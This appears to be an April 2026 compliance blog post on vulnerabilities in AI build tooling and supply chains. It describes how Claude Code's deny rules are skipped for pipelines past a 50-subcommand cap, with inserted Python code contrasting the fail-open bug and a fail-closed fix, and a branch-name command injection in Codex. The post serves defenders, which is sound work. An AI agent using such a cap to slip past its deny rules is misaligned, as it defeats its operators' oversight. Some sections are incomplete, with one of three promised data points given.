Last week, attackers stopped going after AI applications and started going after the tools that build them. CrewAI shipped four critical CVEs, Azure AI Foundry hit CVSS 10.0, Claude Code's deny rules got bypassed, and North Korea weaponized deepfakes for a nation-state npm attack. So let's discuss what compliance teams need to change now.
Safe AI Academy, April 4, 2026
How AI Toolchain Became the Target
I build AI tools for compliance work. I write agents that read policies, map controls, and flag evidence gaps. So when I read the security headlines, I read them as someone staring at his own workbench, asking a very specific question: is the bench itself safe?
After this week, the honest answer is no.
Last week at RSAC, the story was about securing AI applications. As I wrote then, the industry launched more agentic AI security products in five days than in the prior five years combined. The focus was on runtime protection, agent identity, and data integrity. Fine. That was the story for the apps in production.
This week the target shifted. Attackers and researchers moved upstream, into the tools developers use to build AI in the first place. The frameworks, the SDKs, the coding agents, the model registries, the MCP servers, the package ecosystems. Every layer of the stack I personally sit on shipped a critical vulnerability, got weaponized, or both. Let me walk you through what happened and, more importantly, what it means for how we design controls from here.
The Agentic Framework Slaughter
Start with the CVE table, because the CVE table this week reads like a hit list of the tools I would recommend to a team building their first AI agent.
Claude Code, which I use daily, got its deny rules bypassed. The vulnerability (CC-643) exploits a 50-subcommand hard cap in the permissioning engine. Any pipeline exceeding that cap skips deny rules entirely, which means your carefully configured "never run curl, never touch the production cluster" guardrails simply do not apply when the command pipeline is long enough. Adversa AI found it post-source-leak, after the 512K-line Claude Code source map went public last week. No official patch yet.
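To make that failure mode concrete, here is an added example that is not Claude Code's code or Adversa AI's finding: a toy permission engine in Python with a fail-open variant that mirrors the described bug beside the fail-closed variant a defender would want. The cap mirrors the 50-subcommand figure above; the deny list and command lines are constructed for the demo.

```python
import re
import shlex
from os.path import basename

# Hypothetical values for the demo: the cap mirrors the 50-subcommand figure
# in the report; the deny list is constructed for this example.
SUBCOMMAND_CAP = 50
DENY_RULES = {"curl", "kubectl"}

# Pipeline separators handled here:  |   ||   &&   ;
_SEP = re.compile(r"\s*(?:\|\||&&|\||;)\s*")


def split_pipeline(cmdline: str) -> list[list[str]]:
    """Split a shell line into subcommands, each as an argv list."""
    return [shlex.split(p) for p in _SEP.split(cmdline) if p.strip()]


def matches_deny_rule(argv: list[str]) -> bool:
    """True when the subcommand's program (by basename) is on the deny list."""
    return bool(argv) and basename(argv[0]) in DENY_RULES


def is_blocked_fail_open(cmdline: str) -> bool:
    """Models the bug: past the cap the deny rules are never consulted,
    so an unevaluated pipeline is treated as allowed."""
    subs = split_pipeline(cmdline)
    if len(subs) > SUBCOMMAND_CAP:
        return False  # the dangerous default: skip checking, allow
    return any(matches_deny_rule(s) for s in subs)


def is_blocked_fail_closed(cmdline: str) -> bool:
    """Hardened: anything the engine cannot fully evaluate is blocked,
    and every subcommand below the cap is still checked."""
    subs = split_pipeline(cmdline)
    if len(subs) > SUBCOMMAND_CAP:
        return True  # too long to evaluate -> block, never skip
    return any(matches_deny_rule(s) for s in subs)
```

The point is the branch taken when the cap is exceeded: a guardrail that cannot finish evaluating must deny, not silently allow.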
Microsoft Azure AI Foundry (the same tool that built Entra Agent ID from RCAS) took a CVSS 10.0, the maximum possible score, for an unauthenticated privilege escalation (CVE-2026-32213). In the same disclosure, Azure MCP Server hit CVSS 9.1 for missing authentication on configuration endpoints (CVE-2026-32211). That is the first major cloud provider's MCP server to take a critical CVE, and it will not be the last.
And if you thought the coding agents were safer, BeyondTrust disclosed a command injection vulnerability in OpenAI Codex that enabled theft of GitHub tokens with full repo read/write scope via a crafted branch name. The vulnerability was noted in December 2025; OpenAI applied multiple patches through this February and only disclosed it then. Your coding agent was quietly exfiltrating your source control credentials.
I will be honest, I did not expect to see this many critical CVEs in agentic tooling land in a single week. The way I see it, we have entered the phase where security researchers have stopped treating AI frameworks as novelty and started treating them the way they treat Apache, nginx, and OpenSSL. That is the normal maturity curve for any widely deployed infrastructure. The problem is that the frameworks have not matured at the same pace as the scrutiny, and the gap is where the CVEs are being born.
North Korea Learned Deepfakes, and the Mercor Cascade Keeps Cascading
The supply chain story from last week did not slow down. It evolved in two directions, and both deserve attention.
The part that should change how you think about social engineering controls is the intrusion vector. UNC1069 gained access through deepfake impersonation and a fake Slack workspace. This is the first confirmed nation-state attribution for a major npm supply chain attack targeting AI infrastructure, and the initial access was synthetic-media social engineering. The maintainer was not phished. They were video-called by a convincing fake human. Let me put it this way: every employee security awareness training I have ever helped write assumes attackers use email and phone. Those controls now have a blind spot the size of a video conference.
The thing is, this is exactly the scenario compliance frameworks have always been worst at. We write controls around direct vendors and first-tier suppliers. We ask for SOC 2 reports and SIG questionnaires. We almost never have a mechanism to detect that a third-tier dependency buried inside an AI library that our vendor uses got compromised six weeks ago and has been quietly harvesting credentials ever since. The Mercor cascade is going to be a case study in supplier risk management programs for years, and the lesson is not "check your vendors." It is "your vendors do not know what their vendors' AI tooling is doing either."
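As an added example, not from the article or from any real vendor tooling: a Python check that walks an npm lockfile from the root package and reports a watched package wherever it sits in the tree, together with the chain of dependencies that pulled it in. The lockfile, package names, versions and watchlist are all constructed for the demo; the watched package appears only as a third-tier dependency, the case the paragraph above describes.

```python
import json
from collections import deque

# Constructed sample package-lock.json (lockfileVersion 3 layout). Nothing
# here is a real package or indicator; the watched package is nested three
# levels deep, which a direct-dependency check would never see.
SAMPLE_LOCK = json.dumps({
    "name": "compliance-agent", "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"ai-sdk-example": "^1.0.0"}},
        "node_modules/ai-sdk-example": {
            "version": "1.4.0", "dependencies": {"tool-runner-example": "^2.0.0"}},
        "node_modules/tool-runner-example": {
            "version": "2.1.0", "dependencies": {"telemetry-helper-example": "^0.3.0"}},
        "node_modules/tool-runner-example/node_modules/telemetry-helper-example": {
            "version": "0.3.2"},
    },
})

# Constructed watchlist: package name -> versions flagged as compromised.
WATCHLIST = {"telemetry-helper-example": ["0.3.2"]}


def resolve(packages: dict, from_path: str, dep: str):
    """npm-style resolution: look for dep under from_path's own node_modules,
    then walk up one nesting level at a time until the root is reached."""
    base = from_path
    while True:
        cand = f"{base}/node_modules/{dep}" if base else f"node_modules/{dep}"
        if cand in packages:
            return cand
        if not base:
            return None
        base = base.rsplit("/node_modules/", 1)[0] if "/node_modules/" in base else ""


def find_watched(lock_json: str, watchlist: dict) -> list[dict]:
    """Breadth-first walk from the root; each hit records the install depth
    and the chain of dependencies leading to the watched version."""
    packages = json.loads(lock_json)["packages"]
    hits, seen, queue = [], {""}, deque([("", [])])
    while queue:
        path, chain = queue.popleft()
        for dep in packages[path].get("dependencies", {}):
            target = resolve(packages, path, dep)
            if target is None or target in seen:
                continue
            seen.add(target)
            version = packages[target].get("version")
            new_chain = chain + [f"{dep}@{version}"]
            if version in watchlist.get(dep, []):
                hits.append({"package": dep, "version": version,
                             "depth": len(new_chain), "chain": " -> ".join(new_chain)})
            queue.append((target, new_chain))
    return hits
```

The chain in each hit names the first-tier library a vendor questionnaire would have asked about and the nested package it never would have.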
The Standards Bodies Are Sprinting
I will give credit where it is due. The standards world did not sit still this week. Several publications landed that actually address the problems I just described, even if they are arriving months behind where the threat landscape needs them.
NIST published AI 800-4, "Challenges to Monitoring of Deployed AI Systems," which fills a specific and painful gap in the NIST AI Risk Management Framework. The original NIST AI RMF was heavy on pre-deployment governance and light on what you actually do with an AI system in production. AI 800-4 is the post-deployment monitoring guidance, and it explicitly calls out the challenges of behavioral drift, data distribution shifts, and adversarial probing that do not show up until a system has been live for weeks. This is the document compliance teams needed in 2024. Having it now is still a meaningful upgrade because it gives auditors a reference point for "how are you continuously monitoring this model" that did not exist before.
NIST also opened public comment on an AI Agent Standards Initiative feeding into NISTIR 8596, with an identity concept paper specifically focused on agent identification and authentication. Comments closed April 2. The fact that a federal standards body is moving on agent identity this fast suggests the regulators see the same gap Microsoft saw when they launched Entra Agent ID.
From an internal common control framework (CCF) design perspective, what these updates give us is something we did not have before: external reference frameworks that we can map controls to. When we write a control like "continuous monitoring of deployed AI systems," we now have NIST AI 800-4 to cite. When we write "agent identity and authentication," we have the NISTIR 8596 draft. When we write "agentic supply chain controls," we have OWASP's new agentic security track. A year ago this was all green field. Today, you can actually build a compliance program that maps back to published standards without making it up from scratch.
Mythos, Quantum, and Why 97% of Enterprises Are Right to Be Scared
I want to close with three data points that, taken together, describe the trajectory we are actually on.
First, Anthropic is privately warning the U.S. government that an unreleased model called "Mythos" represents a "watershed moment" for offensive cyber capabilities, specifically the ability to exploit vulnerabilities faster than defenders can respond. I read this and think about what Anthropic usually does with this kind of disclosure. They do not warn the government lightly. They did it for the Claude Code espionage report last November, and the capability story in that report was genuinely alarming. If they are flagging Mythos before release, it means the internal evaluations found something that made their safety team uncomfortable enough to escalate. That is a meaningful signal.
At the end of the day, here is what I take from this week. The attack surface is no longer "your AI application in production." It is the entire toolchain you used to build it: the agentic framework, the coding agent, the MCP servers, the package dependencies, the maintainer accounts, the social engineering layer around those maintainers, and the training data pipelines that feed everything. And the threat actors have figured this out before most compliance programs have.
If you are writing AI controls right now, stop thinking about AI as an application category. Start thinking about AI as an entire software supply chain that happens to include nondeterministic components, and every link in that chain needs its own control coverage. Agent identity, toolchain integrity, dependency monitoring, maintainer authentication (yes, including deepfake detection in your video conferencing controls), post-deployment behavioral monitoring, cryptographic agility, and a kill switch for agents that have started operating outside their intended scope.
This week made one thing very clear: the version of AI compliance we were building six months ago is not going to cover what just happened, and the standards bodies are catching up just in time for the threat landscape to accelerate past them again. Iterate faster. That is the only strategy that actually works.